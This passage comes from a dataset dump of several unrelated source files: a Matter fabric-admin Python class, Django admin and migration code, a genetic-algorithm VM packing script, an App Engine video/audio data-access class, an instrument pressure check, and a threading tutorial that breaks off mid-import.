neccessary (see 'Persistence' below for more details)\n\n When vending ChipDeviceController instances on a given fabric, each controller instance\n is associated with a unique fabric index. In the underlying FabricTable, each FabricInfo\n instance can be treated as unique identities that can collide on the same logical fabric.\n\n >> C++ Binding Details\n\n Each instance of the fabric admin is associated with a single instance\n of the OperationalCredentialsAdapter. This adapter instance implements\n the OperationalCredentialsDelegate and is meant to provide a Python\n adapter to the functions in that delegate so that the fabric admin\n can in turn, provide users the ability to generate their own NOCs for devices\n on the network (not implemented yet). For now, it relies on the in-built\n ExampleOperationalCredentialsIssuer to do that.\n\n TODO: Add support for FabricAdmin to permit callers to hook up their own GenerateNOC\n logic.\n\n >> Persistence\n\n Specifically, each instance persists its fabric ID and admin\n index to storage. This is in addition to the persistence built into the ExampleOperationalCredentialsIssuer that persists details\n about the RCAC/ICAC and associated keys as well. This facilitates re-construction of a fabric admin on subsequent\n boot for a given fabric and ensuring it automatically picks up the right ICAC/RCAC details as well.\n '''\n\n activeAdminIndexList = set()\n activeAdmins = set()\n\n @classmethod\n def _Handle(cls):\n return chip.native.GetLibraryHandle()\n\n def AllocateNextAdminIndex(self):\n ''' Allocate the next un-used admin index.\n '''\n nextAdminIndex = 1\n while nextAdminIndex in FabricAdmin.activeAdminIndexList:\n nextAdminIndex = nextAdminIndex + 1\n return nextAdminIndex\n\n def __init__(self, vendorId: int, adminIndex: int = None, fabricId: int = 1):\n ''' Creates a valid FabricAdmin object with valid RCAC/ICAC, and registers itself as an OperationalCredentialsDelegate\n for other parts of the system (notably, DeviceController) to vend NOCs.\n\n vendorId: Valid operational Vendor ID associated with this fabric.\n adminIndex: Local index to be associated with this fabric. This is NOT the fabric index. Each controller on the fabric\n is assigned a unique fabric index.\n\n If omitted, one will be automatically assigned.\n\n fabricId: Fabric ID to be associated with this fabric. This is scoped to the public key of the resultant\n root generated by the underlying ExampleOperationalCredentialsIssuer.\n '''\n self._handle = chip.native.GetLibraryHandle()\n\n if (vendorId is None or vendorId == 0):\n raise ValueError(\n f\"Invalid VendorID ({vendorId}) provided!\")\n\n self._vendorId = vendorId\n self._fabricId = fabricId\n\n if (adminIndex is None):\n self._adminIndex = self.AllocateNextAdminIndex()\n else:\n if (adminIndex in FabricAdmin.activeAdminIndexList):\n raise ValueError(\n f\"AdminIndex {adminIndex} is already being managed by an existing FabricAdmin object!\")\n\n self._adminIndex = adminIndex\n\n FabricAdmin.activeAdminIndexList.add(self._adminIndex)\n\n print(\n f\"New FabricAdmin: FabricId: 0x{self._fabricId:016X}, AdminIndex: {self._adminIndex}, VendorId = 0x{self.vendorId:04X}\")\n self._Handle().pychip_OpCreds_InitializeDelegate.restype = c_void_p\n\n self.closure = builtins.chipStack.Call(\n lambda: self._Handle().pychip_OpCreds_InitializeDelegate(\n ctypes.py_object(self), ctypes.c_uint32(self._adminIndex))\n )\n\n if (self.closure is None):\n raise ValueError(\"Encountered error initializing OpCreds adapter\")\n\n #\n # Persist details to storage (read modify write).\n #\n try:\n adminList = builtins.chipStack.GetStorageManager().GetReplKey('fabricAdmins')\n except KeyError:\n adminList = {str(self._adminIndex): {'fabricId': self._fabricId}}\n builtins.chipStack.GetStorageManager().SetReplKey('fabricAdmins', adminList)\n\n adminList[str(self._adminIndex)] = {'fabricId': self._fabricId, 'vendorId': self.vendorId}\n builtins.chipStack.GetStorageManager().SetReplKey('fabricAdmins', adminList)\n\n self._isActive = True\n self.nextControllerId = 112233\n\n FabricAdmin.activeAdmins.add(self)\n\n def NewController(self, nodeId: int = None, paaTrustStorePath: str = \"\", useTestCommissioner: bool = False):\n ''' Vend a new controller on this fabric seeded with the right fabric details.\n '''\n if (not(self._isActive)):\n raise RuntimeError(\n f\"FabricAdmin object was previously shutdown and is no longer valid!\")\n\n if (nodeId is None):\n nodeId = self.nextControllerId\n self.nextControllerId = self.nextControllerId + 1\n\n print(\n f\"Allocating new controller with FabricId: 0x{self._fabricId:016X}, NodeId: 0x{nodeId:016X}\")\n\n controller = ChipDeviceCtrl.ChipDeviceController(\n self.closure, self._fabricId, nodeId, self.vendorId, paaTrustStorePath, useTestCommissioner, fabricAdmin=self)\n return controller\n\n def ShutdownAll():\n ''' Shuts down all active fabrics, but without deleting them from storage.\n '''\n activeAdmins = copy.copy(FabricAdmin.activeAdmins)\n\n for admin in activeAdmins:\n admin.Shutdown(False)\n\n FabricAdmin.activeAdmins.clear()\n\n def Shutdown(self, deleteFromStorage: bool = True):\n ''' Shutdown this fabric and free up its resources. This is important since relying\n solely on the destructor will not guarantee relishining of C++-side resources.\n\n deleteFromStorage: Whether to delete this fabric's details from persistent storage.\n '''\n if (self._isActive):\n builtins.chipStack.Call(\n lambda: self._Handle().pychip_OpCreds_FreeDelegate(\n ctypes.c_void_p(self.closure))\n )\n\n FabricAdmin.activeAdminIndexList.remove(self._adminIndex)\n\n if (deleteFromStorage):\n adminList = builtins.chipStack.GetStorageManager().GetReplKey('fabricAdmins')\n del(adminList[str(self._adminIndex)])\n if (len(adminList) == 0):\n adminList = None\n\n builtins.chipStack.GetStorageManager().SetReplKey('fabricAdmins', adminList)\n\n FabricAdmin.activeAdmins.remove(self)\n self._isActive = False\n\n def __del__(self):\n self.Shutdown(False)\n\n @property\n def vendorId(self) -> int:\n return self._vendorId\n\n @property\n def fabricId(self) -> int:\n return self._fabricId\n\n @property\n def adminIndex(self) -> int:\n return self._adminIndex\n","sub_path":"src/controller/python/chip/FabricAdmin.py","file_name":"FabricAdmin.py","file_ext":"py","file_size_in_byte":8796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"477659532","text":"from django.contrib import admin\n\nfrom .models import * \nfrom django.http.response import HttpResponseRedirect\n\n# Register your models here.\n\nclass ItemInline(admin.TabularInline):\n model = Item\n fields = [\n ('product', 'quantity'),\n ]\n\nclass OrderAdmin(admin.ModelAdmin):\n change_form_template = 'admin/change_form.html'\n inlines = [ItemInline]\n fieldsets = (\n ('Покупатель', {'fields': ['user']}),\n ('Детали заказа', {'fields': \n [\n\t ('order_source'),\n ('name' , 'phone', 'address',), \n ('delivery', 'payment'),\n 'delivery_discount_use',\n 'coupon',\n 'status', \n ('bonus_gained', 'user_append_bonus',),\n 'bonus_used', \n 'amount', \n ]}),\n )\n autocomplete_fields = ['user',]\n\n list_display = ['user_info', 'created_at', 'status', 'amount']\n\n def user_info(self, obj):\n current_user = obj.user\n if (current_user):\n source = ''\n if obj.order_source:\n source += obj.get_order_source_display() + ', '\n return source + current_user.name + ', ' + current_user.phone\n else:\n result = ''\n if obj.order_source:\n result += obj.get_order_source_display() + ', '\n return result + 'Не авторизованный пользователь'\n\n\n def get_form(self, request, obj=None, change=False, **kwargs):\n form = super().get_form(request, obj, change, **kwargs)\n form.base_fields['user'].label = 'Клиент'\n form.base_fields['amount'].label = 'Сумма заказа'\n form.base_fields['name'].label = 'Имя клиента'\n form.base_fields['phone'].label = 'Телефон клиента'\n form.base_fields['delivery'].label = 'Способ доставки'\n form.base_fields['address'].label = 'Адрес доставки'\n form.base_fields['payment'].label = 'Способ оплаты'\n form.base_fields['bonus_gained'].label = 'Клиент получит бонусов с заказа'\n form.base_fields['bonus_used'].label = 'Оплачено бонусами'\n form.base_fields['coupon'].label = 'Промокод'\n form.base_fields['status'].label = 'Статус заказа'\n form.base_fields['delivery_discount_use'].label = 'Использовать скидку на доставку'\n form.base_fields['user_append_bonus'].label = 'Начислить бонусы клиенту (по завершению заказа)'\n return form\n\n def response_change(self, request, obj):\n if \"_count_amount\" in request.POST:\n # obj.save()\n obj.amount = obj.calc_amount()\n if obj.user:\n if obj.user_append_bonus:\n obj.bonus_gained = calc_bonus_gained(obj.user, obj.amount)\n else:\n obj.bonus_gained = 0 \n else:\n obj.bonus_gained = 0\n obj.save()\n # matching_names_except_this = self.get_queryset(request).filter(name=obj.name).exclude(pk=obj.id)\n # matching_names_except_this.delete()\n # obj.is_unique = True\n # obj.save()\n self.message_user(request, \"Заказ сохранен и посчитан\")\n return HttpResponseRedirect(\".\")\n return super().response_change(request, obj)\n \n\n\nadmin.site.register(Order, OrderAdmin)\n# admin.site.register(ViewedProduct)\n# admin.site.register(Promocode)\n# admin.site.register(Cart)\nadmin.site.register(Coupon)\n# admin.site.register(Item)\n\n\n","sub_path":"cart/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"378521221","text":"import time\r\nimport random\r\nimport copy\r\ndef genetic_alg_boxing(prediction, server_limitation, flavor_specification, population_scale, start_time, duration_time, elite_scale):\r\n\r\n def v0_a_v1_inplace(v0, v1):\r\n #v0 as inplace\r\n for index in range(len(v0)):\r\n v0[index] = v0[index] + v1[index]\r\n \r\n def explane_prediction(prediction):\r\n encode_prediction = []\r\n for key, value in prediction.items():\r\n for i in range(value):\r\n encode_prediction.append(key)#because index0 represent flavor1\r\n return encode_prediction\r\n \r\n def summation_f(prediction, flavor_specification):\r\n result = [0] * len(flavor_specification[1])\r\n for pre in prediction:\r\n v0_a_v1_inplace(result, flavor_specification[pre])\r\n return result\r\n \r\n def initial_population(encode_prediction, population_scale):\r\n initial_population = []\r\n for i in range(population_scale):\r\n random.shuffle(encode_prediction)\r\n initial_population.append(copy.copy(encode_prediction)) \r\n return initial_population\r\n\r\n def evaluation_function(summations, servers, server_limitation):\r\n server_summation = summation_f(servers, server_limitation)\r\n# print(\"summations:\", summations)\r\n# print(\"server_summation:\", server_summation)\r\n result = 0\r\n for index, summation in enumerate(summations):\r\n result += 10000 * summation / server_summation[index] \r\n# print(\"result:\", result)\r\n return result\r\n \r\n \r\n def evaluate_individual(population, server_limitation, flavor_specification, summation):\r\n\r\n evaluation = []\r\n for individual in population:\r\n# print(allocate_server(individual, server_limitation, flavor_specification))\r\n# print(evaluation_function(individual, allocate_server(individual, server_limitation, flavor_specification), flavor_specification, server_limitation, optimization_target))\r\n evaluation.append(\r\n (evaluation_function(summation, allocate_server(individual, server_limitation, flavor_specification)[1], server_limitation)\r\n , individual))\r\n return evaluation \r\n \r\n \r\n def allocate_server(individual, server_limitations, flavor_specifications):\r\n def v0_a_v1_inplace(v0, v1):\r\n #v0 as inplace\r\n for index in range(len(v0)):\r\n v0[index] = v0[index] + v1[index]\r\n \r\n def v0_m_v1_inplace(v0, v1):\r\n # print(\"v0:\", v0)\r\n # print(\"v1:\", v1)\r\n for index in range(len(v0)):\r\n v0[index] = v0[index] - v1[index]\r\n \r\n \r\n def sum_check_result(results):\r\n return sum(results)\r\n \r\n def check_limitation(checked_limitation, target_limitation):\r\n for index in range(len(checked_limitation)):\r\n if checked_limitation[index] > target_limitation[index]:\r\n # print(\"which dimension boom:\", index)\r\n return True\r\n return False\r\n \r\n def check_limitations(checked_limitations, target_limitations):\r\n check_results = []\r\n for index, checked_limitation in enumerate(checked_limitations):\r\n # print(\"checked_limitations:\", checked_limitation)\r\n # print(\"target_limitations:\", target_limitations[index])\r\n check_results.append(check_limitation(checked_limitation, target_limitations[index]))\r\n return check_results \r\n \r\n def add_flavor_limitation_and_end_point(checked_results, limitations, flavor_limitation, end_points, end_point):\r\n # print(\"limitations:\", limitations)\r\n # print(\"end_points:\", end_points)\r\n for index, result in enumerate(checked_results):\r\n if (result == False):\r\n v0_a_v1_inplace(limitations[index], flavor_limitation)\r\n end_points[index] = end_point \r\n \r\n def evaluate_single(summation, server_limitation):\r\n result = 0\r\n for index in range(len(summation)):\r\n result += (summation[index] * 100) / server_limitation[index]\r\n # print(\"result:\", result)\r\n return result\r\n \r\n def evaluate_all(summations, server_limitations, end_points, flavor_specifications, individual):\r\n # print(\"summations:\", summations)\r\n # print(\"server_limitations:\", server_limitations)\r\n # print(\"end_points:\", end_points)\r\n # print(\"flavor_specifications:\", flavor_specifications)\r\n results = []\r\n for index in range(len(summations)):\r\n v0_m_v1_inplace(summations[index], flavor_specifications[individual[end_points[index]]])\r\n results.append(evaluate_single(summations[index], server_limitations[index]))\r\n # print(\"after minus:\", summations)\r\n # print(\"results:\", results)\r\n return results.index(max(results)), end_points[results.index(max(results))]\r\n \r\n def evaluate_last(summations, server_limitations, flavor_specifications, checked_results):\r\n results = []\r\n for index, check in enumerate(checked_results):\r\n if check == True:\r\n results.append(0)\r\n else:\r\n results.append(evaluate_single(summations[index], server_limitations[index]))\r\n return results.index(max(results))\r\n \r\n limitation_temp = [[0] * len(server_limitations[0]) for i in range(len(server_limitations))]\r\n index_point_temp = [0] * len(server_limitations)\r\n checked_results = [False] * len(server_limitations)\r\n allo_result = []\r\n server_result = []\r\n start_point = 0\r\n last_point = len(individual) \r\n index = start_point\r\n while(True):\r\n \r\n while(sum_check_result(checked_results) != len(checked_results)):\r\n # print(\"########################################################################\")\r\n # print(\"individual:\", individual[index:])\r\n # print(\"checked_results:\", checked_results)\r\n flavor_limitation = flavor_specifications[individual[index]]\r\n add_flavor_limitation_and_end_point(checked_results, limitation_temp, flavor_limitation, index_point_temp, index)\r\n # print(\"after add, limitation_temp:\", limitation_temp)\r\n # print(\"after add:\", index_point_temp)\r\n checked_results = check_limitations(limitation_temp, server_limitations)\r\n # print(\"checked_results:\", checked_results)\r\n # print(\"allo_result:\", allo_result)\r\n # print(\"server_result:\", server_result)\r\n # input()\r\n index += 1\r\n # print(\"after individual:\", individual[index:])\r\n if(index == last_point):\r\n break\r\n if(sum_check_result(checked_results) == len(checked_results)):\r\n # print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\r\n server_choosed, end_point = evaluate_all(limitation_temp, server_limitations, index_point_temp, flavor_specifications, individual)\r\n # print(\"server_choosed:\", server_choosed)\r\n # print(\"end_point:\", end_point)\r\n # input()\r\n allo_result.append(individual[start_point:end_point])\r\n server_result.append(server_choosed)\r\n limitation_temp = [[lim for lim in flavor_specifications[individual[end_point]]] for i in range(len(server_limitations))]\r\n index_point_temp = [end_point] * len(server_limitations)\r\n start_point = end_point\r\n index = end_point + 1\r\n # print(\"start_point:\", start_point)\r\n # print(\"index:\", index)\r\n checked_results = check_limitations(limitation_temp, server_limitations)\r\n if(index == last_point):\r\n checked_results = check_limitations(limitation_temp, server_limitations)\r\n server_choosed = evaluate_last(limitation_temp, server_limitations, flavor_specifications, checked_results)\r\n allo_result.append(individual[start_point:])\r\n server_result.append(server_choosed)\r\n break\r\n return allo_result, server_result\r\n\r\n def Propagate_descendants(evaluation, elite_scale):\r\n def mutate(individual):\r\n \r\n individual = copy.copy(individual)\r\n individual_size = len(individual)\r\n mutation_point = random.randint(0, individual_size-1) # minus one because endpoint included\r\n left_len = mutation_point\r\n right_len = individual_size - 1 - mutation_point\r\n # candidate_len = left_len if left_len <= right_len else right_len\r\n # print(\"mutation_point:\", mutation_point)\r\n direction = \"left\" if left_len < right_len else \"right\" if left_len > right_len else \"center\"\r\n # print(\"direction:\", direction)\r\n # print(\"left_len:\", left_len)\r\n # print(\"right_len:\", right_len)\r\n if direction == \"left\":\r\n \r\n exchange_len = random.randint(1, left_len+1)\r\n # print(\"exchange_len:\", exchange_len)\r\n left_end_point = mutation_point + 1\r\n left_start_point = left_end_point-exchange_len\r\n \r\n left_slice = slice(left_start_point, left_end_point)\r\n \r\n right_start_point = random.randint(mutation_point+1, individual_size-exchange_len)\r\n right_end_point = right_start_point+exchange_len\r\n right_slice = slice(right_start_point, right_end_point)\r\n # right_slice = slice()\r\n elif direction == \"right\":\r\n exchange_len = random.randint(1, right_len+1)\r\n # print(\"exchange_len:\", exchange_len) \r\n right_start_point = mutation_point\r\n right_end_point = mutation_point + exchange_len\r\n right_slice = slice(right_start_point, right_end_point)\r\n \r\n left_end_point = random.randint(exchange_len, mutation_point)\r\n left_start_point = left_end_point - exchange_len\r\n left_slice = slice(left_start_point, left_end_point)\r\n elif direction == \"center\":\r\n return individual\r\n \r\n # print(\"left_slice:\", left_slice)\r\n # print(\"right_slice:\", right_slice)\r\n temp = individual[left_slice]\r\n individual[left_slice] = individual[right_slice]\r\n # print(\"individual:\", individual)\r\n individual[right_slice] = temp\r\n # print(\"individual:\", individual)\r\n return individual\r\n \r\n \r\n origin_scale = len(evaluation)\r\n del(evaluation[elite_scale:])\r\n# print(\"len(evaluation):\", len(evaluation))\r\n# elite_group = evaluation[0:elite_scale]\r\n mutated_group = []\r\n for i in range(elite_scale, origin_scale):\r\n individual = random.sample(evaluation, 1)[0][1]\r\n# mutated_individual = mutate(individual)\r\n# elite_group.append(evaluate_individual())\r\n mutated_group.append(mutate(individual))\r\n# print(\"mutated_group:\", mutated_group)\r\n# evaluate_individual(mutated_group, )\r\n return mutated_group \r\n \r\n def single_server_summation(single_server, flavor_specification):\r\n summation = [0] * len(flavor_specification[1])\r\n for v in single_server:\r\n summation[0] += flavor_specification[v][0]\r\n summation[1] += flavor_specification[v][1]\r\n return summation \r\n \r\n \r\n encode_prediction = explane_prediction(prediction)\r\n summation = summation_f(encode_prediction, flavor_specification)\r\n population = initial_population(encode_prediction, population_scale)\r\n evaluation = evaluate_individual(population, server_limitation, flavor_specification, summation)\r\n evaluation.sort(reverse = True)\r\n while(time.clock()-start_time < duration_time):\r\n descendants = Propagate_descendants(evaluation, elite_scale)\r\n evaluation.extend(evaluate_individual(descendants, server_limitation, flavor_specification, summation))\r\n evaluation.sort(reverse = True)\r\n print(\"the best individual you get:\")\r\n print(evaluation[0][0]/float(200), len(allocate_server(evaluation[0][1], server_limitation, flavor_specification)[1]))\r\n print(\"################## finally result ########################\")\r\n allo_result, server_result = allocate_server(evaluation[0][1], server_limitation, flavor_specification)\r\n print(\"one server with virtual machine summation of virtual machine server specification\")\r\n for index, allo in enumerate(allo_result):\r\n print(allo, single_server_summation(allo, flavor_specification), server_limitation[server_result[index]])\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef test():\r\n flavor_specification = {1:[1, 1024], 2:[1, 2048], 3:[1, 4096], 4:[2, 2048], 5:[2, 4096], 6:[2, 8192],\r\n 7:[4, 4096], 8:[4, 8192], 9:[4, 16384], 10:[8, 8192], 11:[8, 16384],\r\n 12:[8, 32768], 13:[16, 16384], 14:[16, 32768], 15:[16, 65536], 16:[32, 32768], 17:[32, 65536], 18:[32, 131072]}\r\n server_limitation=[[56,131072], [84, 262144], [112, 196608]]\r\n prediction = {1:0,2:0,3:0,4:9,5:38,6:114,7:238,8:35,9:0,10:188,11:0,12:0,13:0,14:0,15:0,16:0,17:0,18:0}\r\n start_time = time.clock()\r\n duration_time = 50\r\n population_scale = 100\r\n res=genetic_alg_boxing(prediction, server_limitation, flavor_specification, population_scale, start_time, duration_time, elite_scale=population_scale/5)\r\n \r\nif __name__ == '__main__':\r\n test()","sub_path":"ecs/new_deploy_all_flavor.py","file_name":"new_deploy_all_flavor.py","file_ext":"py","file_size_in_byte":14187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"157859762","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0002_auto_20150812_1230'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='author',\n field=models.ForeignKey(null=True, to=settings.AUTH_USER_MODEL),\n ),\n migrations.AlterField(\n model_name='post',\n name='created_date',\n field=models.DateTimeField(default=datetime.datetime(2015, 8, 12, 14, 11, 3, 223906, tzinfo=utc)),\n ),\n ]\n","sub_path":"djangogirls_tutorial/blog/migrations/0003_auto_20150812_1511.py","file_name":"0003_auto_20150812_1511.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"627528683","text":"'''\nCreated on 22-Apr-2014\n\n@author: tousif\n'''\nfrom collections import defaultdict\nfrom datetime import datetime\nimport json\nimport logging\n\nfrom com.dub.objects.Audio import Audio\nfrom com.dub.objects.Video import Video\nfrom google.appengine.ext import ndb\n\n\nclass BrandReportDataAccess:\n \n parentPFList = \"\"\n \n def __init__(self):\n# self.connection=ConnectionManager().get_connection()\n return \n \n \n def tree(self):\n return defaultdict(self.tree)\n\n def VideoLink(self, videoLink):\n \"\"\"Constructs a Datastore key for a Guestbook entity with guestbook_name.\"\"\"\n return ndb.Key('Video', videoLink)\n \n def AudioLink(self, audioKeys):\n \"\"\"Constructs a Datastore key for a Guestbook entity with guestbook_name.\"\"\"\n return ndb.Key('Audio', audioKeys) \n \n def AddNewVideo(self, name, videoLink, videocat):\n \n# v = self.VideoLink(videoLink)\n \n vidquery = Video.query(ancestor=self.VideoLink(videoLink))\n \n videos = vidquery.get()\n if(videos != None):\n logging.info(str(videos.videolink))\n \n if(str(videos.videolink) == videoLink):\n post = dict()\n post[\"error\"] = \"Already Exists\"\n return json.dumps(post)\n else:\n vid = Video(parent=self.VideoLink(videoLink))\n # name=\"sample\",videolink=videoLink,audiolink=\"\",videoCategory=\"Entertainment\"\n vid.name = name\n vid.videolink = videoLink\n vid.audiolink = \"\"\n vid.videoCategory = videocat\n vid.dubsCount = 0\n vid.addedDate = datetime.now()\n vid.put()\n post = dict()\n post[\"result\"] = \"Added new video\"\n return json.dumps(post)\n \n \n def GetVideoLinks(self, category, sortBy):\n logging.info(category)\n if(sortBy == \"time\"):\n if(category == \"all\"):\n vidquery = Video.query().order(-Video.addedDate)\n else:\n vidquery = Video.query(Video.videoCategory == str(category)).order(-Video.addedDate)\n elif(sortBy == \"dubscount\"):\n if(category == \"all\"):\n vidquery = Video.query().order(-Video.dubsCount)\n else:\n vidquery = Video.query(Video.videoCategory == str(category)).order(-Video.dubsCount)\n videos = vidquery.fetch(100)\n# logging.info(str(videos))\n \n \n Videos = []\n \n for video in videos:\n vidobj = dict()\n vidobj[\"videoname\"] = str(video.name)\n vidobj[\"videolink\"] = str(video.videolink)\n vidobj[\"videocat\"] = str(video.videoCategory)\n vidobj[\"dubscount\"] = str(video.dubsCount)\n vidobj[\"addeddate\"] = str(video.addedDate)\n Videos.append(vidobj)\n \n \n return json.dumps(Videos)\n \n \n def GetAudioByLink(self, videoLink):\n audquery = Audio.query(ancestor=self.AudioLink(videoLink)).order(-Audio.viewCount)\n audios = audquery.fetch(100)\n Audios = []\n for audio in audios:\n aud = dict()\n aud[\"audname\"] = audio.name\n aud[\"audkey\"] = str(audio.audiolink)\n aud[\"composer\"] = audio.composer\n aud[\"starttime\"] = str(audio.starttime)\n aud[\"viewcount\"] = str(audio.viewCount)\n aud[\"language\"] = str(audio.language)\n# aud[\"audname\"]=audio.name\n \n logging.info(audio.audiolink)\n Audios.append(aud)\n return json.dumps(Audios) \n \n \n def AddNewAudio(self, blobkeys, audioname, videoLink, composer, composeremail, starttime, language):\n \n# logging.info(str(blob))\n \n \n vid = Video.query(Video.videolink == videoLink)\n v = vid.get()\n v.dubsCount = int(v.dubsCount) + 1\n v.put()\n \n \n audioKeys = blobkeys\n aud = Audio(parent=self.AudioLink(videoLink))\n aud.audiolink = audioKeys[0]\n aud.videolink = videoLink\n aud.name = audioname\n aud.audioblobkey = audioKeys\n aud.upvotes = 0\n aud.downvotes = 0\n aud.composer = composer\n aud.composerEmail = composeremail\n aud.recordeddate = datetime.now()\n aud.starttime = starttime\n aud.language = language \n aud.viewCount = 0\n aud.put()\n post = dict()\n post[\"result\"] = audioKeys\n return json.dumps(post)\n \n def GetAudioDetails(self, audkey):\n \n# audquery = Audio.query(ancestor=self.AudioLink(videoLink))\n q = Audio.query(Audio.audiolink == audkey)\n# q = ndb.gql(\"Select * from Audio where audioblobkey = :1\",audBlobkey)\n Audios = []\n audio = q.get()\n logging.info(audio)\n if(audio != None):\n aud = dict()\n aud[\"audname\"] = audio.name\n aud[\"audkey\"] = str(audio.audiolink)\n aud[\"composer\"] = audio.composer\n aud[\"starttime\"] = str(audio.starttime)\n aud[\"viewcount\"] = str(audio.viewCount)\n aud[\"language\"] = str(audio.language)\n # aud[\"audname\"]=audio.name\n \n Audios.append(aud)\n else:\n aud = dict()\n aud[\"error\"] = \"Url contains in valid audio key\"\n Audios.append(aud)\n return json.dumps(Audios)\n \n\n \n def IncreaseViewCount(self, audiokey, viewcount):\n q = Audio.query(Audio.audiolink == audiokey)\n aud = q.get()\n aud.viewCount = int(viewcount)\n aud.put()\n post = dict()\n post[\"result\"] = \"View count Incresed by 1\"\n return json.dumps(post)\n \n def GetVideoDetails(self, videoUrl):\n vid = Video.query(Video.videolink == videoUrl)\n video = vid.get()\n vidobj = dict()\n vidobj[\"videoname\"] = str(video.name)\n vidobj[\"videolink\"] = str(video.videolink)\n vidobj[\"videocat\"] = str(video.videoCategory)\n vidobj[\"dubscount\"] = str(video.dubsCount)\n vidobj[\"addeddate\"] = str(video.addedDate)\n return json.dumps(vidobj)\n \n def getVideoSearch(self, searchterm):\n vidquery = Video.query(ndb.AND(Video.name >= searchterm, Video.name <= searchterm + u'\\ufffd'))\n videos = vidquery.fetch(100)\n# logging.info(str(videos))\n \n \n Videos = []\n \n for video in videos:\n vidobj = dict()\n vidobj[\"videoname\"] = str(video.name)\n vidobj[\"videolink\"] = str(video.videolink)\n vidobj[\"videocat\"] = str(video.videoCategory)\n vidobj[\"dubscount\"] = str(video.dubsCount)\n vidobj[\"addeddate\"] = str(video.addedDate)\n Videos.append(vidobj)\n \n \n return json.dumps(Videos)\n \n \n \n \n","sub_path":"src/com/dub/database/BrandReportDataAccess.py","file_name":"BrandReportDataAccess.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"481306301","text":"#!/kroot/rel/default/bin/kpython\n\nimport ktl\nimport time\nimport sys\n\ntimestr = time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\nverbose = False\npthresh = 1.e-6 # Pressure threshhold\n\nif len(sys.argv) > 1:\n for par in sys.argv[1:]:\n if 'v' in par:\n verbose = True\n else:\n try:\n tt = float(par)\n pthresh = tt\n except ValueError:\n print(\"parameter? - %s\" % par)\n\ntry:\n ktl_pressure = ktl.cache('krvs', 'pressure')\nexcept:\n if verbose:\n print(timestr + ': KRVS server not running!')\n sys.exit(0)\n\npressure = float(ktl_pressure.read())\n# Pressure exceeds threshhold\nif pressure > pthresh:\n print(timestr + \": Pressure exceeds %.3e: %.3e\" % (pthresh, pressure))\nelse:\n if verbose:\n print(timestr + \": Pressure is %.3e\" % pressure)\n print(timestr + \": Threshold pressure is %.3e\" % pthresh)\n","sub_path":"kcwi/check_pressure.py","file_name":"check_pressure.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"185592220","text":"from multiprocessing import Process\nfrom os import getpid\nfrom threading import Thread, Lock\nfrom random import randint\nfrom time import time, sleep\n\ndef download_task(filename):\n # print('start process, number [%d]' % getpid())\n print('start downloading %s ' %filename)\n time_to_download = randint(5, 10)\n sleep(time_to_download)\n print('%s download finished, takes %d seconds' %(filename, time_to_download))\n\n\ndef main_process():\n start = time()\n p1 = Process(target=download_task, args=('Pythom.pdf', ))\n p1.start()\n p2 = Process(target=download_task, args=('Peking.avi', ))\n p2.start()\n p1.join()\n p2.join()\n end = time()\n print('total takes %.2f seconds.' %(end-start))\n\n\nclass DownloadTask(Thread):\n\n def __init__(self, filename):\n super().__init__()\n self._filename = filename\n\n def run(self):\n print('start downloading %s ' %self._filename)\n time_to_download = randint(5, 10)\n sleep(time_to_download)\n print('%s download finished, takes %d seconds' %(self._filename, time_to_download))\n\n\ndef main_Thread():\n start = time()\n #p1 = Thread(target=download_task, args=('Pythom.pdf', ))\n p1 = DownloadTask('python.pdf')\n p1.start()\n #p2 = Thread(target=download_task, args=('Peking.avi', ))\n p2 = DownloadTask('Peking.avi')\n p2.start()\n p1.join()\n p2.join()\n end = time()\n print('total takes %.2f seconds.' %(end-start))\n\n\n# saving money\nclass Account(object):\n\n def __init__(self):\n self._balance = 0\n self._lock = Lock()\n\n def deposit(self, money):\n self._lock.acquire()\n try:\n new_balance = self._balance + money\n sleep(0.01)\n self._balance = new_balance\n finally:\n self._lock.release()\n\n @property\n def balance(self):\n return self._balance\n\nclass AddMoneyThread(Thread):\n\n def __init__(self, account, money):\n super().__init__()\n self._account = account\n self._money = money\n\n def run(self):\n self._account.deposit(self._money)\n\ndef main_deposit():\n account = Account()\n threads =[]\n for _ in range(100):\n t = AddMoneyThread(account, 1)\n threads.append(t)\n t.start()\n\n for t in threads:\n t.join()\n print('account money: %d' %account.balance)\n\n\n# Study Case 1 : Coroutine with download procedure\nimport time\nimport tkinter\nimport tkinter.messagebox\n\ndef download():\n time.sleep(10)\n tkinter.messagebox.showinfo('Tips', 'Finish downloading.')\n\ndef show_about():\n tkinter.messagebox.showinfo('About', 'Author: ryan')\n\ndef main_coroutine():\n \n class DownloadTaskHandler(Thread):\n\n def run(self):\n time.sleep(10)\n tkinter.messagebox.showinfo('tips', 'Finish download!')\n btn1.config(state=tkinter.NORMAL)\n\n def download():\n btn1.config(state=tkinter.DISABLED)\n DownloadTaskHandler(daemon=True).start()\n\n\n top = tkinter.Tk()\n top.title('Single Thread')\n top.geometry('200x150')\n top.wm_attributes('-topmost', True)\n\n panel = tkinter.Frame(top)\n btn1 = tkinter.Button(panel, text='Download', command=download)\n btn1.pack(side='left')\n\n btn2 = tkinter.Button(panel, text='About', command=show_about)\n btn2.pack(side='right')\n panel.pack(side='bottom')\n\n tkinter.mainloop()\n\n\n# Study Case 2 : Divide and Conqure\nfrom time import time\nfrom multiprocessing import Process, 